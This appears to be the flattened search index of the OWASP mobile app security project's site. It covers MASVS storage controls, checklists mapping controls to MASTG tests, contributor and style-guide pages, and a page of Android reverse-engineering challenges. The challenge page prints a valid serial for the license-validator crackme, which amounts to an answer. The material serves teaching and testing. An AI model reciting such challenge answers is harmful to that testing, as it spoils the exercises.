Apps handle sensitive data coming from many sources such as the user, the backend, system services or other apps on the device and usually need to store it locally. The storage locations may be private to the app (e.g. its internal storage) or be public and therefore accessible by the user or other installed apps (e.g. public folders such as Downloads). This control ensures that any sensitive data that is intentionally stored by the app is properly protected independently of the target location.
"},{"location":"MASVS/controls/MASVS-STORAGE-2/","title":"MASVS-STORAGE-2","text":"The app prevents leakage of sensitive data.
There are cases when sensitive data is unintentionally stored or exposed to publicly accessible locations; typically as a side-effect of using certain APIs, system capabilities such as backups or logs. This control covers this kind of unintentional leaks where the developer actually has a way to prevent it.
"},{"location":"checklists/MASVS-AUTH/","title":"MASVS AUTH","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-AUTH-1 The app uses secure authentication and authorization protocols and follows the relevant best practices. MASVS-AUTH-2 The app performs local authentication securely according to the platform best practices. Testing Confirm Credentials Testing Biometric Authentication Testing Local Authentication MASVS-AUTH-3 The app secures sensitive operations with additional authentication. "},{"location":"checklists/MASVS-CODE/","title":"MASVS CODE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CODE-1 The app requires an up-to-date platform version. MASVS-CODE-2 The app has a mechanism for enforcing app updates. Testing Enforced Updating Testing Enforced Updating MASVS-CODE-3 The app only uses software components without known vulnerabilities. Checking for Weaknesses in Third Party Libraries Checking for Weaknesses in Third Party Libraries MASVS-CODE-4 The app validates and sanitizes all untrusted inputs. Make Sure That Free Security Features Are Activated Testing for Injection Flaws Testing Local Storage for Input Validation Memory Corruption Bugs Testing Object Persistence Testing Implicit Intents Testing for URL Loading in WebViews Testing Object Persistence Memory Corruption Bugs Make Sure That Free Security Features Are Activated "},{"location":"checklists/MASVS-CRYPTO/","title":"MASVS CRYPTO","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CRYPTO-1 The app employs current strong cryptography and uses it according to industry best practices. Testing Random Number Generation Testing Symmetric Cryptography Testing the Configuration of Cryptographic Standard Algorithms Verifying the Configuration of Cryptographic Standard Algorithms Testing Random Number Generation MASVS-CRYPTO-2 The app performs key management according to industry best practices. Testing the Purposes of Keys Testing Key Management "},{"location":"checklists/MASVS-NETWORK/","title":"MASVS NETWORK","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-NETWORK-1 The app secures all network traffic according to the current best practices. Testing the TLS Settings Testing Data Encryption on the Network Testing Endpoint Identity Verification Testing the Security Provider Testing Data Encryption on the Network Testing Endpoint Identity Verification Testing the TLS Settings MASVS-NETWORK-2 The app performs identity pinning for all remote endpoints under the developer's control. Testing Custom Certificate Stores and Certificate Pinning Testing Custom Certificate Stores and Certificate Pinning "},{"location":"checklists/MASVS-PLATFORM/","title":"MASVS PLATFORM","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PLATFORM-1 The app uses IPC mechanisms securely. Testing for Vulnerable Implementation of PendingIntent Determining Whether Sensitive Stored Data Has Been Exposed via IPC Mechanisms Testing for App Permissions Testing for Sensitive Functionality Exposure Through IPC Testing Deep Links Testing Universal Links Testing UIActivity Sharing Testing UIPasteboard Testing Custom URL Schemes Testing App Permissions Testing App Extensions Determining Whether Sensitive Data Is Exposed via IPC Mechanisms MASVS-PLATFORM-2 The app uses WebViews securely. Testing WebViews Cleanup Testing for Java Objects Exposed Through WebViews Testing WebView Protocol Handlers Testing JavaScript Execution in WebViews Testing iOS WebViews Determining Whether Native Methods Are Exposed Through WebViews Testing WebView Protocol Handlers MASVS-PLATFORM-3 The app uses the user interface securely. Checking for Sensitive Data Disclosure Through the User Interface Testing for Overlay Attacks Finding Sensitive Information in Auto-Generated Screenshots Testing Auto-Generated Screenshots for Sensitive Information Checking for Sensitive Data Disclosed Through the User Interface "},{"location":"checklists/MASVS-PRIVACY/","title":"MASVS PRIVACY","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PRIVACY-1 The app minimizes access to sensitive data and resources. MASVS-PRIVACY-2 The app prevents identification of the user. MASVS-PRIVACY-3 The app is transparent about data collection and usage. MASVS-PRIVACY-4 The app offers user control over their data. "},{"location":"checklists/MASVS-RESILIENCE/","title":"MASVS RESILIENCE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-RESILIENCE-1 The app validates the integrity of the platform. Testing Root Detection Testing Emulator Detection Testing Jailbreak Detection Testing Emulator Detection MASVS-RESILIENCE-2 The app implements anti-tampering mechanisms. Testing File Integrity Checks Making Sure that the App is Properly Signed Testing Runtime Integrity Checks Testing File Integrity Checks Making Sure that the App Is Properly Signed MASVS-RESILIENCE-3 The app implements anti-static analysis mechanisms. Testing for Debugging Code and Verbose Error Logging Testing for Debugging Symbols Testing Obfuscation Testing for Debugging Code and Verbose Error Logging Testing Obfuscation Testing for Debugging Symbols MASVS-RESILIENCE-4 The app implements anti-dynamic analysis techniques. Testing Anti-Debugging Detection Testing whether the App is Debuggable Testing Reverse Engineering Tools Detection Testing Anti-Debugging Detection Testing Reverse Engineering Tools Detection Testing whether the App is Debuggable "},{"location":"checklists/MASVS-STORAGE/","title":"MASVS STORAGE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-STORAGE-1 The app securely stores sensitive data. Testing the Device-Access-Security Policy Testing Local Storage for Sensitive Data Testing Local Data Storage MASVS-STORAGE-2 The app prevents leakage of sensitive data. Determining Whether Sensitive Data Is Shared with Third Parties via Embedded Services Testing Backups for Sensitive Data Testing Logs for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties via Notifications Testing Memory for Sensitive Data Determining Whether the Keyboard Cache Is Disabled for Text Input Fields Testing Memory for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties Testing Backups for Sensitive Data Checking Logs for Sensitive Data Finding Sensitive Data in the Keyboard Cache "},{"location":"contributing/1_How_Can_You_Contribute/","title":"How Can You Contribute?","text":"You can directly contribute to the MASVS or MASTG in many different ways! First, go ahead and create a GitHub account for free on the GitHub homepage.
"},{"location":"contributing/1_How_Can_You_Contribute/#contribution-flow","title":"Contribution Flow","text":"flowchart LR\n A(Open Discussion) -->|discuss| C{qualifies?}\n C -->|Yes| D(Issue)\n C -->|No| E[Close]\n D -->|open PR| F(Pull Request)\n F -->|review| G{approved?}\n F -->|make changes| F\n G -->|Yes| H[Merge]\n G -->|No| I[Close]
"},{"location":"contributing/1_How_Can_You_Contribute/#participate-in-discussions","title":"\ud83d\udcac Participate in Discussions","text":"Our GitHub Discussions are the first place to go to ask questions, give feedback, and propose new ideas. If your proposal qualifies for the MASTG/MASVS, we'll convert it into an \"Issue\" (the discussion might take a while).
"},{"location":"contributing/1_How_Can_You_Contribute/#create-issues","title":"\ud83c\udfaf Create Issues","text":"Before creating a PR, first create an Issue to be discussed for missing requirements, content or errors.
You can contribute with content or corrections by opening a Pull Request (PR).
Learn how to open a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#become-a-reviewer","title":"\u2705 Become a Reviewer","text":"You can Review Pull Requests (PRs) and also gain contributions. If you are a fluent speaker in any of the different languages that the MASVS is available in, feel free to give feedback on any of the submitted PRs.
After your PR or issue has been submitted, we will review it as quickly as possible which typically only takes a few days. If you think we have forgotten about it, feel free to give us a nudge after 7 days have passed.
Learn how to review a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#proof-reading","title":"\ud83d\udd0e Proof-reading","text":"If you do proof-reading, these are the things we\u2019re looking for:
Refer to Google Technical Writing trainings for more info:
First of all Create a GitHub account (a free one is enough) by following these steps.
Our workflow is like this:
Open a Discussion (for ideas and proposals) If your proposal qualifies for the MASTG/MASVS we'll convert it into an \"Issue\" (the discussion might take a while).
MASVS Example: \"Add a MASVS-CRYPTO requirement on Key rotation\"
MASTG Example: \"Add a Test case for key rotation\"
Open an Issue (for concrete actionable things that have to / could be done) For instance, there's a typo, or it's clear that a certain Test case doesn't have e.g. \"Dynamic Analysis\" and it should be added.
Normally, contributors should follow the whole flow. But sometimes it's clear what's needed so we directly go to 2 (open an issue) or even to 3 (open a PR). We recommend starting with a discussion or directly contacting us to save you the hurdle of writing and submitting new content that does not qualify so we have to reject it after the work is done.
If you just have a specific question you can post it to (you need a GitHub Account):
\"GitHub Discussions\" are re-posted to our Slack channel.
Once you get your answer please mark it as answered. When you mark a question as an answer, GitHub will highlight the comment and replies to the comment to help visitors quickly find the answer.
"},{"location":"contributing/2_Getting_Started/#contribute-online","title":"Contribute Online","text":"GitHub makes this extremely easy.
For small changes in one file:
For more complex changes or across files:
.
while browsing the repo or pull request.Learn more about the github.dev Web-based Editor in \"GitHub Docs\".
"},{"location":"contributing/2_Getting_Started/#contribute-offline","title":"Contribute Offline","text":"For this you need an IDE or text editor and git on your machine. We recommend using the free Visual Studio Code editor with the markdownlint extension.
$ git clone https://github.com/<your_github_user>/owasp-masvs.git\n$ cd owasp-masvs/\n$ git remote add upstream git@github.com:OWASP/owasp-masvs.git\n
$ git checkout -b fix-issue-1456\n
git add MYFILE
for every file you have modified, followed by git commit -m 'Your Commit Message'
to commit the modifications and git push
to push your modifications to GitHub.You can create a Pull Request (PR) by following these steps. Remember that:
master
.#<issue-id>
\".Your PR will be reviewed soon (refer to this page to learn more about reviews).
Before opening a PR please self-review your changes in GitHub and ensure that you follow our style guide to speed up the review process\u26a1
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-incorporate-the-reviewers-feedback-to-your-pr","title":"How to Incorporate the Reviewer's Feedback to your PR","text":"It might be directly approved and merged or one of our reviewers will send you some comments and suggested changes.
When reviewers suggest changes in a pull request, you can automatically incorporate the changes into your PR.
NOTE: Remember to regularly sync your fork with the upstream repo. This gets you the latest changes and makes it easier to merge your PR.
git pull upstream master\n
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-review-a-pr","title":"How to Review a PR","text":"If you'd like to review an open PR please follow these steps:
"},{"location":"contributing/3_PRs_and_Reviews/#step-1-comment-and-suggest-changes","title":"Step 1: Comment and Suggest Changes","text":"You can enter single or multi-line comments (click and drag to select the range of lines):
Always prefer making \"Suggested Changes\" using the \u00b1
button:
If the suggestion you'd like to make cannot be expressed using \"suggested changes\" please enter a clear comment explaining what should be fixed (e.g. some paragraphs don't link properly or some essential information cannot be found and should be added).
Using \"Suggested Changes\" saves you as a reviewer and the PR author a lot of time. And you get points (attributions) for the changes that you suggested (if the author commits them you become a co-author of those commits). If you're consistent with your reviewer work, you can apply to be recognized as an official reviewer on our Acknowledgements page.
"},{"location":"contributing/3_PRs_and_Reviews/#step-2-submit-your-review","title":"Step 2: Submit your Review","text":"Once you have gone through the whole PR, you can submit your review
Learn more: \"(GitHub Docs) Reviewing proposed changes in a pull request\".
"},{"location":"contributing/4_Add_new_Language/","title":"Add a New Language","text":""},{"location":"contributing/4_Add_new_Language/#mastg-translations","title":"MASTG Translations","text":"The MASTG is a living document that changes and adapts to the most recent security recommendations every day. While we do want to reach the maximum audience possible, our past experience shows that maintaining translations has proven to be an extremely challenging task. Therefore, please understand that any PRs containing MASTG translations will be declined, but you're free to do them on your own forks.
\ud83c\uddef\ud83c\uddf5 A translation of the MASTG into Japanese is available on Github: https://github.com/coky-t/owasp-mstg-ja. Thanks to @coky-t for pushing this forward!
That said, we **strongly encourage** further translations of the MASVS as it is much easier to maintain, and you'll get a translated Mobile App Security Checklist mapping to the MASTG for free.
"},{"location":"contributing/4_Add_new_Language/#masvs-translations","title":"MASVS Translations","text":"To add a new language you have to follow the steps from both sections below.
Document-ja
.metadata.md
from another language and modify it for the new language.export.py
.github/workflows/docgenerator.yml
and add the action steps for the new language.../LANGS.md
to include the new language.../README.md
with the newly available language.IMPORTANT: only after releasing the MASVS!
src/scripts/gen_all_excel.sh
.The following rules are meant to ensure consistency of the MASTG:
We recommend you to take these free Google courses when writing or reviewing content for the MAS project:
The primary measure for the amount of content on a page should be based on the purpose it serves.
Those containing one or two screens of text at most. Users are scanning for link choices. Use longer pages (those that require more scrolling or reading) deeper within the chapter where content can be printed and read later.
Consider creating a supporting document and linking to it from the page rather than displaying all the information directly on the page.
"},{"location":"contributing/5_Style_Guide/#gender-neutrality","title":"Gender Neutrality","text":"The MASTG reaches all kind of people all over the world. To ensure inclusiveness and diversity, please refrain from using the following throughout the book:
Or any other constructions like \"he/she\", \"s/he\", \"his or her\". Instead, use the following gender-neutral alternatives:
There is one exception: We are still using \"man in the middle\", as it is simply a common term in the industry and there is no common replacement for it.
"},{"location":"contributing/5_Style_Guide/#timeliness-of-content","title":"Timeliness of Content","text":"Keeping accurate and timely content establishes the OWASP MAS deliverables as a credible and trustworthy source of information.
When using statistical data on your page, ensure that the information is current and up-to-date and is accompanied by the source from which it was derived, along with the date the data was compiled.
"},{"location":"contributing/5_Style_Guide/#content-for-the-digital-platform-versus-for-print","title":"Content for the Digital Platform Versus for Print","text":"Write concise content that the user can read quickly and efficiently. For digital content - create shorter pages that are cross-linked. If your content is likely to be printed, create one long page.
"},{"location":"contributing/5_Style_Guide/#audience","title":"Audience","text":"Write for an international audience with a basic level of technical understanding i.e. they have a mobile phone and know how to install an app. Avoid hard-to-translate slang words/phrases to ensure content is accessible to readers who aren't native English speakers.
"},{"location":"contributing/5_Style_Guide/#context-and-orientation","title":"Context and Orientation","text":"Let the users know where they are on every page. Establish the topic by using a unique page heading.
Include a clear and concise introduction where possible.
Link to background information where necessary.
"},{"location":"contributing/5_Style_Guide/#write-so-people-will-read-with-joy","title":"Write so People Will Read with Joy","text":"Use the following methods to increase scannability:
-
rather than asterisks *
for listsFor longer pages, use the following tools to make the page easily scannable:
When presenting your content in a list format:
When using a number between zero and ten, spell out the number (e.g., \"three\" or \"ten\").
When using any number higher than ten, use the numeric version (e.g., \"12\" or \"300\").
"},{"location":"contributing/5_Style_Guide/#2-language","title":"2. Language","text":""},{"location":"contributing/5_Style_Guide/#american-spelling-and-terminology","title":"American Spelling and Terminology","text":"Use American spelling and terminology.
Change all British spelling and terminology to the American equivalents where applicable. This includes \"toward\" (US) vs. \"towards\" (UK), \"among\" (US) vs. \"amongst\" (UK), \"analyze\" (US) vs. \"analyse\" (UK), \"behavior\" (US) vs \"behaviour\" (UK), etc.
"},{"location":"contributing/5_Style_Guide/#plurals","title":"Plurals","text":"Adhere to standard grammar and punctuation rules when it comes to pluralization of typical words.
The plural of calendar years does not take the apostrophe before the \"s\". For example, the plural form of 1990 is 1990s.
"},{"location":"contributing/5_Style_Guide/#title-capitalization","title":"Title Capitalization","text":"We follow the title case rules from the \"Chicago Manual of Style\":
When in doubt, you can verify proper capitalization on https://titlecaseconverter.com/.
"},{"location":"contributing/5_Style_Guide/#standardization","title":"Standardization","text":"This is a list of words/abbreviations that are used inconsistently at the moment in the MASTG and need standardization:
Use the following common contractions:
Abbreviations include acronyms, initialisms, shortened words, and contractions.
The following snippet demonstrates most of these points:
## JAR Files\n\nJAR (Java ARchive) files are [...]\n\nAPKs are packed using the ZIP format. An APK is a variation of a JAR file [...]\n
For commonly used file formats such as APK, IPA or ZIP, please do not refer to them as \".apk\", \".ipa\" or \".zip\" unless you're explicitly referring to the file extension.
"},{"location":"contributing/5_Style_Guide/#referencing-android-versions","title":"Referencing Android versions","text":"Use the following format when referring to an Android version: Android X (API level YY). Usage of the descriptive name (Ex: Oreo) is discouraged.
Ex: Android 9 (API level 28)
"},{"location":"contributing/5_Style_Guide/#addressing-the-reader-in-test-cases","title":"Addressing the Reader in Test Cases","text":"Throughout the guide, you may want to address the readers in order to tell them what to do, or what they should notice. For any such case, use an active approach and simply address the reader using \"you\".
Correct: If you open the AndroidManifest.xml file, you will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If you run the following command, you will see that atr1 is actually dangerous: [...].
Wrong: The AndroidManifest.xml file contains an Application tag, with the following attributes: atr1, atr2 and atr3. The command below shows that atr1 is dangerous: [...].
Wrong: If we open the AndroidManifest.xml file, we will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If we run the following command, we will see that atr1 is actually dangerous: [...].
"},{"location":"contributing/5_Style_Guide/#3-external-references","title":"3. External References","text":""},{"location":"contributing/5_Style_Guide/#web-links","title":"Web Links","text":"Use markdown's in-line link format (A) [TEXT](URL \"TITLE\")
or (B) [TEXT](URL)
.
For example:
The [threat modeling guidelines defined by OWASP](https://owasp.org/www-community/Threat_Modeling \"OWASP Threat Modeling\") are generally applicable to mobile apps.\n
When using (A), be sure to escape special characters such as apostrophe (\\') or single quote (`), as otherwise the link will be broken in Gitbook.
Wrong usage, see \"iPhone's\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone's UDID\")\n
Right usage, see \"iPhone\\'s\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone\\'s UDID\")\n
When adding links to the \"References\" section at the end of the chapters use - Title - <url>
. This is needed to force latex to print URLs properly for the PDF.
For example:
- adb - <https://developer.android.com/studio/command-line/adb>\n
"},{"location":"contributing/5_Style_Guide/#books-and-papers","title":"Books and Papers","text":"For books and papers, use the following format: [#NAME]
.
And include the full reference in the \"References\" section at the end of the markdown file manually. Example:
An obfuscated encryption algorithm can generate its key (or part of the key)\nusing data collected from the environment [#riordan].\n
And under the \"References\" section at the end of the chapters:
- [#riordan] - James Riordan, Bruce Schneier. Environmental Key Generation towards Clueless Agents. Mobile Agents and Security, Springer Verlag, 1998\n
Papers:
The general form for citing technical reports is to place the name and location of the company or institution after the author and title and to give the report number and date at the end of the reference.
Basic Format:
- [shortname] J. K. Author, \"Title of report,\" Abbrev. Name of Co., City of Co., Abbrev. State, Rep. xxx, year\n\n- [shortname] \\[Author(s)\\], \\[Title\\] - Link\n
Books:
- [shortname] \\[Author(s)\\], \\[Title\\], \\[Published\\], \\[Year\\]\n\n- [examplebook] J. K. Author, \"Title of chapter in the book,\" in Title of His Published Book, xth ed. City of Publisher, Country if not USA: Abbrev. of Publisher, year, ch. x, sec. x, pp. xxx-xxx.\n
NOTE: Use et al. when three or more names are given
e.g.
- [klaus] B. Klaus and P. Horn, Robot Vision. Cambridge, MA: MIT Press, 1986.\n- [stein] L. Stein, \"Random patterns,\" in Computers and You, J. S. Brake, Ed. New York: Wiley, 1994, pp. 55-70.\n- [myer] R. L. Myer, \"Parametric oscillators and nonlinear materials,\" in Nonlinear Optics, vol. 4, P. G. Harper and B. S. Wherret, Eds. San Francisco, CA: Academic, 1977, pp. 47-160.\n- [abramowitz] M. Abramowitz and I. A. Stegun, Eds., Handbook of Mathematical Functions (Applied Mathematics Series 55). Washington, DC: NBS, 1964, pp. 32-33.\n
"},{"location":"contributing/5_Style_Guide/#4-references-within-the-guide","title":"4. References Within The Guide","text":"For references to other chapters in the MASTG, simply name the chapter, e.g.: See also the chapter \"Basic Security Testing\"
, See the section \"Apktool\" in the chapter \"Basic Security Testing\"
etc. The MASTG should be convenient to read as a printed book, so use internal references sparingly. Alternatively you can create a link for the specific section:
See the section \"[App Bundles](0x05a-Platform-Overview.md#app-bundles)\" in the chapter ...\n
Note that in such a case the anchor (everything after the #
) should be lowercase, and spaces should be replaced with hyphens.
Pictures should be uploaded to the Images/Chapters directory. Afterwards they should be embedded by using the image tag, a width of 500px should be specified. For example:
<img src=\"Images/Chapters/0x06d/key_hierarchy_apple.jpg\" width=\"500px\"/>\n- *iOS Data Protection Key Hierarchy*\n
"},{"location":"contributing/5_Style_Guide/#6-punctuation-conventions","title":"6. Punctuation Conventions","text":""},{"location":"contributing/5_Style_Guide/#lowercase-or-capital-letter-after-a-colon","title":"Lowercase or Capital Letter after a Colon","text":"Chicago Manual of Style (6.61: Lowercase or capital letter after a colon) says: lowercase the first word unless it is a proper noun or the start of at least two complete sentences or a direct question.
"},{"location":"contributing/5_Style_Guide/#serial-comma-use","title":"Serial Comma Use","text":"Use a serial comma before \"and\" for the last item in a run-in list of three or more items. For example:
We bought apples, oranges, and tomatoes from the store.
"},{"location":"contributing/5_Style_Guide/#quote-marks-and-apostrophes","title":"Quote Marks and Apostrophes","text":"Use straight double quotes, straight single quotes, and straight apostrophes (not curly quotes/apostrophes).
"},{"location":"contributing/5_Style_Guide/#technical-terms","title":"Technical Terms","text":"Spell/punctuate specific technical terms as they are used by the company (e.g., use the company website).
In order of preference, spell/punctuate generic technical terms according to
Markdown blockquotes can be used for comments in the documents by using >
> This is a blockquote\n
"},{"location":"contributing/5_Style_Guide/#8-code-and-shell-commands","title":"8. Code and Shell Commands","text":"Use code blocks when including sample code, shell commands, and paths. In Markdown, code blocks are denoted by triple backticks (```
). GitHub also supports syntax highlighting for a variety of languages. For example, a Java code block should be annotated as follows:
```java\n public static void main(String[] args) { System.out.println(\" Hello World!\"); } } ;\n ```\n
This produces the following result:
public static void main(String[] args) { System.out.println(\" Hello World!\"); } }\n
When including shell commands, make sure to specify the language for correct syntax highlighting (e.g. shell
or bash
) and remove any host names and usernames from the command prompt, e.g.:
```shell\n $ echo 'Hello World'\n Hello World\n ```\n
When a command requires parameters that need to be modified by the reader, surround them with angle brackets:
$ adb pull <remote_file> <target_destination>\n
"},{"location":"contributing/5_Style_Guide/#in-text-keywords","title":"In-text Keywords","text":"When they do not occur in a code block, place the following code-related keywords in backticks (``
), double straight quote marks (\"\"
), or leave unpunctuated according to the table:
true
, 0
, YES
) XML attributes (e.g., get-task-allow
on iOS Plists, \"@string/app_name\"
on Android Manifests) XML attribute values (e.g., android:label
on Android Manifests) property names object names API calls interface names If nouns in backticks are plural, place the \"s\" after the second backtick (e.g. RuntimeException
s). Do not add parentheses, brackets, or other punctuation to any keywords that are in backticks (e.g., main
not main()
).
When referring to any UI element by name, put its name in boldface, using **<name>**
(e.g., Home -> Menu).
The MAS project is a powerful learning resource and the MAS Crackmes are no exception. They allow the MAS community not only to practice the MAS skills they've learned from the MASTG but also let them confirm their approaches to the used techniques, especially when performing reverse engineering.
"},{"location":"contributing/6_Add_a_Crackme/#who-can-contribute-with-a-crackme","title":"Who Can Contribute with a Crackme?","text":"Anyone from individuals to companies. You only have to read and accept the Terms and Conditions listed below.
Before submitting a crackme, first of all contact the MAS team here: https://mas.owasp.org/contact/
"},{"location":"contributing/6_Add_a_Crackme/#terms-and-conditions","title":"Terms and Conditions","text":"If you want to contribute to the MAS crackmes please consider that:
\u2611\ufe0f The source code of the crackme apps must be made publicly available at https://github.com/OWASP/mas-crackmes.
\u2611\ufe0f The crackme apps must be reviewed and approved by the MAS project leaders. Some form of documentation and solution writeup/video must be provided for the review process. That must include a list of \"features\" including techniques used (e.g. obfuscation, whitebox crypto, inline assembly, etc.)
\u2611\ufe0f The crackme apps must not contain any company branding or advertising material (ads, company URL, etc.).
\u2611\ufe0f The crackme apps must align with the MASVS and MASTG in some way.
\u2611\ufe0f The crackme authors are fully responsible for the maintenance of the crackme in the case bugfixes or updates are needed and the MAS team is not able to perform those actions.
"},{"location":"contributing/6_Add_a_Crackme/#publishing-and-acknowledgements","title":"Publishing and Acknowledgements","text":"When successfully adding a crackme, its authors will be credited in the corresponding crackme page in the project website at https://mas.owasp.org/crackmes and an announcement will be made via the official MAS social media channels.
"},{"location":"contributing/6_Add_a_Crackme/#owasp-openness-and-licencing-guidelines","title":"OWASP Openness and Licencing Guidelines","text":"The OWASP projects have a strong foundation in openness and this includes all material related to the projects.
OWASP Projects must be open in all facets, including source material, contributors, organizational structure, and finances (if any). Project source code (if applicable) must be made openly available, project communication channels (e.g. mailing lists, forums) should be open and free from censorship, and all project materials must be licensed under a community friendly license as approved by the Free Software Foundation (Appendix 8.2).
Please refer to the OWASP Project Leader Handbook that we as project leaders need to comply with: https://owasp.org/www-pdf-archive/PROJECT_LEADER-HANDBOOK_2014.pdf
"},{"location":"crackmes/","title":"MAS Crackmes","text":"Welcome to the MAS Crackmes aka. UnCrackable Apps, a collection of mobile reverse engineering challenges. These challenges are used as examples throughout the OWASP MASTG. Of course, you can also solve them for fun.
Android UnCrackable L1 UnCrackable-Level1.apk Download Android UnCrackable L2 UnCrackable-Level2.apk Download Android UnCrackable L3 UnCrackable-Level3.apk Download Android UnCrackable L4 r2pay-v0.9.apk Download Android UnCrackable DRM validate (ELF 32-bit) Download iOS UnCrackable L1 UnCrackable-Level1.ipa Download iOS UnCrackable L2 UnCrackable-Level2.ipa Download "},{"location":"crackmes/Android/","title":"Android Crackmes","text":""},{"location":"crackmes/Android/#android-uncrackable-l1","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level1.apk\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#android-uncrackable-l2","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level2.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"crackmes/Android/#android-uncrackable-l3","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level3.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"crackmes/Android/#android-uncrackable-l4","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed of its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
Download v0.9
Download v1.0
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.This app is compatible with Android 4.4 and up.
$ adb install r2pay-v0.9.apk\n
SPOILER (Solutions) Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"crackmes/Android/#android-license-validator","title":"Android License Validator","text":"A brand new Android app sparks your interest. Of course, you are planning to purchase a license for the app eventually, but you'd still appreciate a test run before shelling out $1. Unfortunately no keygen is available! Generate a valid serial key that is accepted by this app.
Download
InstallationCopy the binary to your Android device and run using the shell.
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n$ adb shell chmod 755 /data/local/tmp/validate\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n$ adb shell /data/local/tmp/validate 1234\nIncorrect serial (wrong format).\n$ adb shell /data/local/tmp/validate JACE6ACIARNAAIIA\nEntering base32_decode\nOutlen = 10\nEntering check_license\nProduct activation passed. Congratulations!\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#mastg-hacking-playground","title":"MASTG Hacking Playground","text":"Did you enjoy working with the Crackmes? There is more! Go to the MASTG Hacking Playground and find out!
